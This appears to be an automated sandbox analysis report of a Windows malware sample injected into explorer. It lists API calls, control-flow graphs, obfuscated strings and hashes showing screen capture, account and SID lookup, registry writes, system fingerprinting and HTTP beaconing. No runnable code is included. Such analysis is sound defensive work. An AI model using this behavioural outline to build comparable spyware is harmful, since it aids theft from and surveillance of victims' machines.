                                                                                                        • GdipGetImageEncoders.GDIPLUS(00000000,00000000,00000000), ref: 00767387
                                                                                                        • GdipSaveImageToFile.GDIPLUS(00000000,00000000,?,00000000), ref: 0076740E
                                                                                                        • SelectObject.GDI32(00000000,?), ref: 0076741B
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00767428
                                                                                                        • DeleteObject.GDI32(?), ref: 00767430
                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 0076743A
                                                                                                        • GdipDisposeImage.GDIPLUS(00000000), ref: 00767441
                                                                                                        • GdiplusShutdown.GDIPLUS(?), ref: 007674E3
                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 007675BA
                                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00767600
                                                                                                        • GetSidIdentifierAuthority.ADVAPI32(?), ref: 0076760D
                                                                                                        • GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00767721
                                                                                                        • GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00767748
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Value$Gdip$CloseImageMetricsObjectOpenSystem$AuthorityCreate$BitmapCompatibleDeleteEncodersGdiplusNameQuerySelect$AccountCountDisposeEnumFileFromIdentifierInfoLookupReleaseSaveShutdownSizeStartupUser
                                                                                                        • String ID: $($KQRwfI==$MQLwfI==$NBqAOvw1C0P=$NBqAOvw1CRb=$NBqAOvw1ChD=$NBqAOvw1Chz=$NtUnmapViewOfSection$VwQpdzQu$Wkbo1O5KHy==$YBqAOvw=$image/jpeg$invalid stoi argument$ntdll.dll$stoi argument out of range
                                                                                                        • API String ID: 1729688432-2321920341
                                                                                                        • Opcode ID: dd8189179259eb1aad4fea967f964824a1669f2b4c3e3f7b43592c97a120dbfd
                                                                                                        • Instruction ID: 6caffc2fbd9c0ae271e5973c471ae4f11c218289b80c79f67c060eda60e8ed79
                                                                                                        • Opcode Fuzzy Hash: dd8189179259eb1aad4fea967f964824a1669f2b4c3e3f7b43592c97a120dbfd
                                                                                                        • Instruction Fuzzy Hash: 70D2F771A00118DBDF18DF64CC89BEDBB75EF45304F508298F806A7292EB399A94CF95
                                                                                                        Function 0077F060 Relevance: 40.1, APIs: 4, Strings: 18, Instructions: 1574registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 007661F0: GetUserNameA.ADVAPI32(?,?), ref: 007675BA
                                                                                                          • Part of subcall function 007661F0: LookupAccountNameA.ADVAPI32(00000000,?,?,000000FF,?,?,?), ref: 00767600
                                                                                                          • Part of subcall function 007661F0: GetSidIdentifierAuthority.ADVAPI32(?), ref: 0076760D
                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System,00000000,000F003F,?,00000000), ref: 0077F142
                                                                                                        • RegCloseKey.KERNELBASE(80000002), ref: 0077F158
                                                                                                        • GetUserNameA.ADVAPI32(?,80000002), ref: 0077F1E2
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0077F26D
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                          • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 007664E3
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00766511
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000001), ref: 0076651A
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0076663C
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0076665F
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000002), ref: 00766668
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseNameOpen$Value$User$AccountAuthorityFileIdentifierLookupModuleQuery
                                                                                                        • String ID: 0EQ $246122658369$776334$OQUAOo==$System$V$ZVO $ZVy $Zka $bUG $c03 $c1C $cFO $d0G $dEC $dhQ=$eUU $elC
                                                                                                        • API String ID: 4106312383-465785502
                                                                                                        • Opcode ID: 03a8f0ac7ba156151931463cc7460eaed65dd642a2286fa40da9b28e05629296
                                                                                                        • Instruction ID: bf0ca363297cf504b46aef802c6d206643797790b277695301e0243bb95c35b9
                                                                                                        • Opcode Fuzzy Hash: 03a8f0ac7ba156151931463cc7460eaed65dd642a2286fa40da9b28e05629296
                                                                                                        • Instruction Fuzzy Hash: 87D2E471A001589BEB29E728CD897DDBB769B82304F5481D8E00DA72D7EB395FC48F91
                                                                                                        Function 0076B700 Relevance: 32.7, APIs: 12, Strings: 6, Instructions: 1232COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0076A270: GetTempPathA.KERNEL32(00000104,?,3F07E9DB,?,00000000), ref: 0076A2B7
                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0076B77B
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 0076639C
                                                                                                          • Part of subcall function 007661F0: RegQueryValueExA.KERNELBASE(3F07E9DB,?,00000000,00000000,?,00000400,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663CA
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.KERNELBASE(3F07E9DB,?,?,00000000,00000001,3F07E9DB,3F07E9DB), ref: 007663D6
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076B8B5
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076B9EF
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000001,80000001,00000000,000F003F,00000001), ref: 007664E3
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000001,?,00000000,00000002,?,?), ref: 00766511
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000001), ref: 0076651A
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076BB29
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076BC63
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,000F003F,80000002), ref: 0076663C
                                                                                                          • Part of subcall function 007661F0: RegSetValueExA.ADVAPI32(80000002,?,00000000,00000004,?,00000004), ref: 0076665F
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(80000002), ref: 00766668
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076BD9D
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076BED7
                                                                                                          • Part of subcall function 007661F0: RegOpenKeyExA.KERNELBASE(?,00000000), ref: 007667BD
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076C011
                                                                                                          • Part of subcall function 007661F0: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00766894
                                                                                                          • Part of subcall function 007661F0: RegEnumValueA.KERNELBASE(?,00000000,?,00001000,00000000,00000000,00000000,00000000), ref: 007668E0
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076C14B
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076C285
                                                                                                        • GetFileAttributesA.KERNELBASE(00000000,?,00000000,00000000), ref: 0076C3BF
                                                                                                          • Part of subcall function 007661F0: RegCloseKey.ADVAPI32(?), ref: 00766D5E
                                                                                                        • GetFileAttributesA.KERNELBASE(?,?,00000000,00000000), ref: 0076C4FF
                                                                                                          • Part of subcall function 007693D0: GetVersionExW.KERNEL32(0000011C,3F07E9DB,74DF0F00), ref: 0076944A
                                                                                                          • Part of subcall function 007693D0: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007694AB
                                                                                                          • Part of subcall function 007693D0: GetProcAddress.KERNEL32(00000000), ref: 007694B2
                                                                                                          • Part of subcall function 007693D0: GetNativeSystemInfo.KERNELBASE(?), ref: 00769573
                                                                                                          • Part of subcall function 007693D0: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00769577
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile$CloseOpenValue$Info$QuerySystem$AddressEnumHandleModuleNativePathProcTempVersion
                                                                                                        • String ID: R0ZxdUNw$RTPL$RVPteeA=$STDJXs==$UkZCfy5v$V0ZAcy5A
                                                                                                        • API String ID: 3951112935-690854277
                                                                                                        • Opcode ID: d57a20cc2001d6db0ab6966b4b0c037c3e1ed7d4a5b9f48589dd4ae0ae79c691
                                                                                                        • Instruction ID: 424fd20076c972596195b23cfda6694f937a2c0d10b38a125354d4603af154d7
                                                                                                        • Opcode Fuzzy Hash: d57a20cc2001d6db0ab6966b4b0c037c3e1ed7d4a5b9f48589dd4ae0ae79c691
                                                                                                        • Instruction Fuzzy Hash: B2923A71A00148DBDF09DBB8CD897EDBB71AF46310F648208E856A73D7E73D5A808B65
                                                                                                        Function 0076E8D0 Relevance: 26.8, APIs: 8, Strings: 7, Instructions: 600comtimeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2132 76e8d0-76e94a GetUserNameA 2133 76e951-76e956 2132->2133 2133->2133 2134 76e958-76ec5a call 783f40 call 785f60 call 786300 call 785f60 call 786300 call 783030 call 785f60 call 786300 call 785f60 call 786300 call 785f60 call 786300 CoInitialize 2133->2134 2159 76ec85 2134->2159 2160 76ec5c-76ec79 CoCreateInstance 2134->2160 2163 76ec87-76ec90 2159->2163 2161 76ec7f CoUninitialize 2160->2161 2162 76f00b-76f031 2160->2162 2161->2159 2176 76f037-76f03c 2162->2176 2177 76f0dc-76f24b call 78b340 GetLocalTime CoUninitialize 2162->2177 2164 76ecc7-76eced 2163->2164 2165 76ec92-76eca7 2163->2165 2166 76ed24-76ed4a 2164->2166 2167 76ecef-76ed04 2164->2167 2169 76ecbd-76ecc4 call 789d26 2165->2169 2170 76eca9-76ecb7 2165->2170 2174 76ed81-76eda7 2166->2174 2175 76ed4c-76ed61 2166->2175 2172 76ed06-76ed14 2167->2172 2173 76ed1a-76ed21 call 789d26 2167->2173 2169->2164 2170->2169 2178 76f278-76f27f call 78ea38 2170->2178 2172->2173 2172->2178 2173->2166 2185 76edd8-76edfc 2174->2185 2186 76eda9-76edb8 2174->2186 2183 76ed77-76ed7e call 789d26 2175->2183 2184 76ed63-76ed71 2175->2184 2176->2159 2179 76f042-76f051 2176->2179 2177->2163 2205 76f053-76f065 CoUninitialize 2179->2205 2206 76f06a-76f0d7 CoUninitialize call 783030 * 4 call 76e8d0 2179->2206 2183->2174 2184->2178 2184->2183 2191 76ee33-76ee59 2185->2191 2192 76edfe-76ee13 2185->2192 2187 76edce-76edd5 call 789d26 2186->2187 2188 76edba-76edc8 2186->2188 2187->2185 2188->2178 2188->2187 2199 76ee90-76eeb6 2191->2199 2200 76ee5b-76ee70 2191->2200 2197 76ee15-76ee23 2192->2197 2198 76ee29-76ee30 call 789d26 2192->2198 2197->2178 2197->2198 2198->2191 2202 76eee7-76ef08 2199->2202 2203 76eeb8-76eec7 2199->2203 2209 76ee86-76ee8d call 789d26 2200->2209 2210 76ee72-76ee80 2200->2210 2213 76ef36-76ef4e 2202->2213 2214 76ef0a-76ef16 2202->2214 2211 76eedd-76eee4 call 789d26 2203->2211 2212 76eec9-76eed7 2203->2212 2205->2159 2206->2163 2209->2199 2210->2178 2210->2209 2211->2202 2212->2178 2212->2211 2224 76ef50-76ef5c 2213->2224 2225 76ef7c-76ef94 2213->2225 2221 76ef2c-76ef33 call 789d26 2214->2221 2222 76ef18-76ef26 2214->2222 2221->2213 2222->2178 2222->2221 2232 76ef72-76ef79 call 789d26 2224->2232 2233 76ef5e-76ef6c 2224->2233 2227 76ef96-76efa2 2225->2227 2228 76efc2-76efda 2225->2228 2235 76efa4-76efb2 2227->2235 2236 76efb8-76efbf call 789d26 2227->2236 2237 76efe0-76efec 2228->2237 2238 76f25a-76f277 call 7896b0 2228->2238 2232->2225 2233->2178 2233->2232 2235->2178 2235->2236 2236->2228 2244 76eff2-76f000 2237->2244 2245 76f250-76f257 call 789d26 2237->2245 2244->2178 2249 76f006 2244->2249 2245->2238 2249->2245
                                                                                                        APIs
                                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 0076E91D
                                                                                                        • CoInitialize.OLE32(00000000), ref: 0076EC52
                                                                                                        • CoCreateInstance.OLE32(007BD064,00000000,00000001,007BD0C4,?), ref: 0076EC71
                                                                                                        • CoUninitialize.OLE32 ref: 0076EC7F
                                                                                                        • CoUninitialize.OLE32 ref: 0076F053
                                                                                                        • CoUninitialize.OLE32 ref: 0076F06A
                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0076F16C
                                                                                                        • CoUninitialize.OLE32 ref: 0076F240
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Uninitialize$CreateInitializeInstanceLocalNameTimeUser
                                                                                                        • String ID: @3P$EOexNKWuBQR=$MQQRE9==$MQQxNKWu$VCZXXs==$bFH4evkwBu==$bFH4ezI7BwZ=
                                                                                                        • API String ID: 1302556198-549416660
                                                                                                        • Opcode ID: 445cf8398b6c121c237e3e38e12cb97d7a6d6a34a42f4215d95067d5b924b263
                                                                                                        • Instruction ID: 4bedb090576b02b59671ed5baefb5cb6c1480f3a2a48c12702cf40c55e535eb9
                                                                                                        • Opcode Fuzzy Hash: 445cf8398b6c121c237e3e38e12cb97d7a6d6a34a42f4215d95067d5b924b263
                                                                                                        • Instruction Fuzzy Hash: EB425B71A00218DFDB24DF64CC98BDEBBB5AF59304F5041D8E809A7291DB79AAC4CF91
                                                                                                        Function 00770370 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 312networkfilesleepCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2267 770370-7703bc 2268 7707c7-7707f2 call 783f40 2267->2268 2269 7703c2-7703c6 2267->2269 2275 7707f4-770800 2268->2275 2276 770820-770838 2268->2276 2269->2268 2271 7703cc-7703d0 2269->2271 2271->2268 2273 7703d6-770474 Sleep InternetOpenW InternetConnectA call 783030 call 7661f0 2271->2273 2299 770476 2273->2299 2300 770478-770494 HttpOpenRequestA 2273->2300 2278 770816-77081d call 789d26 2275->2278 2279 770802-770810 2275->2279 2280 77077e-770796 2276->2280 2281 77083e-77084a 2276->2281 2278->2276 2279->2278 2283 77089b-7708a0 call 78ea38 2279->2283 2287 77086f-77088b call 7896b0 2280->2287 2288 77079c-7707a8 2280->2288 2285 770774-77077b call 789d26 2281->2285 2286 770850-77085e 2281->2286 2285->2280 2286->2283 2296 770860 2286->2296 2289 770865-77086c call 789d26 2288->2289 2290 7707ae-7707bc 2288->2290 2289->2287 2290->2283 2297 7707c2 2290->2297 2296->2285 2297->2289 2299->2300 2305 770496-7704a5 2300->2305 2306 7704c5-770534 call 783030 call 7661f0 call 783030 call 7661f0 2300->2306 2307 7704a7-7704b5 2305->2307 2308 7704bb-7704c2 call 789d26 2305->2308 2319 770536 2306->2319 2320 770538-77054e HttpSendRequestA 2306->2320 2307->2308 2308->2306 2319->2320 2321 770550-77055f 2320->2321 2322 77057f-7705a7 2320->2322 2323 770575-77057c call 789d26 2321->2323 2324 770561-77056f 2321->2324 2325 7705a9-7705b8 2322->2325 2326 7705d8-7705f9 InternetReadFile 2322->2326 2323->2322 2324->2323 2329 7705ce-7705d5 call 789d26 2325->2329 2330 7705ba-7705c8 2325->2330 2327 7705ff 2326->2327 2331 770600-7706b0 call 78adc0 InternetReadFile 2327->2331 2329->2326 2330->2329
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000005DC,3F07E9DB,?,00000000), ref: 00770402
                                                                                                        • InternetOpenW.WININET(007BCC10,00000000,00000000,00000000,00000000), ref: 00770411
                                                                                                        • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00770435
                                                                                                        • HttpOpenRequestA.WININET(?,00000000), ref: 0077047F
                                                                                                        • HttpSendRequestA.WININET(?,00000000), ref: 0077053F
                                                                                                        • InternetReadFile.WININET(?,?,000003FF,?), ref: 007705F1
                                                                                                        • InternetReadFile.WININET(?,00000000,000003FF,?), ref: 007706A0
                                                                                                        • InternetCloseHandle.WININET(?), ref: 007706C7
                                                                                                        • InternetCloseHandle.WININET(?), ref: 007706CF
                                                                                                        • InternetCloseHandle.WININET(?), ref: 007706D7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                                                                        • String ID: VCZXXs==$VkLx$bFH4evkwBu==$bFH4ezI7BwZ=$invalid stoi argument$stoi argument out of range$f|
                                                                                                        • API String ID: 1439999335-1513691568
                                                                                                        • Opcode ID: 5d38d4754973b9baf195eed000472fdbba86969e64acdd3bdabcfa8a83b776b3
                                                                                                        • Instruction ID: 2646f6d7389a69f0ffba2330404639b7b3381f261ec6c0e4402c699548dab1ac
                                                                                                        • Opcode Fuzzy Hash: 5d38d4754973b9baf195eed000472fdbba86969e64acdd3bdabcfa8a83b776b3
                                                                                                        • Instruction Fuzzy Hash: 82B1B2B1600218DBDF28DF28CC88BAE7B65EF41344F5081A9F50997292D7799AC4CFD5
                                                                                                        Function 007693D0 Relevance: 18.0, APIs: 6, Strings: 4, Instructions: 473libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 2342 7693d0-769452 call 78b340 GetVersionExW 2345 7699f6-769a13 call 7896b0 2342->2345 2346 769458-769480 call 783030 call 7661f0 2342->2346 2353 769484-7694a6 call 783030 call 7661f0 2346->2353 2354 769482 2346->2354 2359 7694aa-7694c3 GetModuleHandleA GetProcAddress 2353->2359 2360 7694a8 2353->2360 2354->2353 2361 7694f4-76951f 2359->2361 2362 7694c5-7694d4 2359->2362 2360->2359 2365 769550-769571 2361->2365 2366 769521-769530 2361->2366 2363 7694d6-7694e4 2362->2363 2364 7694ea-7694f1 call 789d26 2362->2364 2363->2364 2367 769a14 call 78ea38 2363->2367 2364->2361 2371 769577 GetSystemInfo 2365->2371 2372 769573-769575 GetNativeSystemInfo 2365->2372 2369 769546-76954d call 789d26 2366->2369 2370 769532-769540 2366->2370 2377 769a19-769a1f call 78ea38 2367->2377 2369->2365 2370->2367 2370->2369 2376 76957d-769586 2371->2376 2372->2376 2379 7695a4-7695a7 2376->2379 2380 769588-76958f 2376->2380 2381 769997-76999a 2379->2381 2382 7695ad-7695b6 2379->2382 2384 769595-76959f 2380->2384 2385 7699f1 2380->2385 2381->2385 2389 76999c-7699a5 2381->2389 2387 7695b8-7695c4 2382->2387 2388 7695c9-7695cc 2382->2388 2386 7699ec 2384->2386 2385->2345 2386->2385 2387->2386 2391 769974-769976 2388->2391 2392 7695d2-7695d9 2388->2392 2393 7699a7-7699ab 2389->2393 2394 7699cc-7699cf 2389->2394 2401 769984-769987 2391->2401 2402 769978-769982 2391->2402 2395 7695df-769647 call 783030 call 7661f0 call 783030 call 7661f0 call 766320 2392->2395 2396 7696b9-76995d call 783030 call 7661f0 call 783030 call 7661f0 call 766320 call 783030 call 7661f0 call 7691b0 call 783030 call 7661f0 call 783030 call 7661f0 call 766320 call 783030 call 7661f0 call 7691b0 call 783030 call 7661f0 call 783030 call 7661f0 call 766320 call 783030 call 7661f0 call 7691b0 call 783030 call 7661f0 call 783030 call 7661f0 call 766320 call 783030 call 7661f0 call 7691b0 2392->2396 2397 7699c0-7699ca 2393->2397 2398 7699ad-7699b2 2393->2398 2399 7699d1-7699db 2394->2399 2400 7699dd-7699e9 2394->2400 2426 76964b-76966b call 79189f 2395->2426 2427 769649 2395->2427 2437 769963-76996c 2396->2437 2397->2385 2398->2397 2405 7699b4-7699be 2398->2405 2399->2385 2400->2386 2401->2385 2403 769989-769995 2401->2403 2402->2386 2403->2386 2405->2385 2432 7696a2-7696a4 2426->2432 2433 76966d-76967c 2426->2433 2427->2426 2432->2437 2438 7696aa-7696b4 2432->2438 2435 769692-76969f call 789d26 2433->2435 2436 76967e-76968c 2433->2436 2435->2432 2436->2377 2436->2435 2437->2381 2442 76996e 2437->2442 2438->2437 2442->2391
                                                                                                        APIs
                                                                                                        • GetVersionExW.KERNEL32(0000011C,3F07E9DB,74DF0F00), ref: 0076944A
                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 007694AB
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 007694B2
                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00769573
                                                                                                        • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00769577
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.3580786588.0000000000761000.00000020.00000001.01000000.00000000.sdmp, Offset: 00760000, based on PE: true
                                                                                                        • Associated: 0000000E.00000002.3580749069.0000000000760000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580870957.00000000007B0000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580915251.00000000007C5000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3580952355.00000000007CC000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                        • Associated: 0000000E.00000002.3581004685.00000000007D2000.00000008.00000001.01000000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_760000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                                                                        • String ID: NhqBP9==$NhqBQI==$NhqCO9==$NhqCPI==
                                                                                                        • API String ID: 374719553-1220407608
                                                                                                        • Opcode ID: 7efc70eab84aeea91d1aa79bef8d16623a3394a4f3c02de50c63422b51e6bf8d
                                                                                                        • Instruction ID: 72c89766c7a057e10b8ee5fe3d3c3de79ac2fd5f539793942c5c3aa10b1d9300
                                                                                                        • Opcode Fuzzy Hash: 7efc70eab84aeea91d1aa79bef8d16623a3394a4f3c02de50c63422b51e6bf8d
                                                                                                        • Instruction Fuzzy Hash: A1022BB0E00244DBDB14BB68CD5A79D7B75AB45710F94429CED06673C2EB3D5E818BC2
                                                                                                        Function 0079E430 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 330timeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
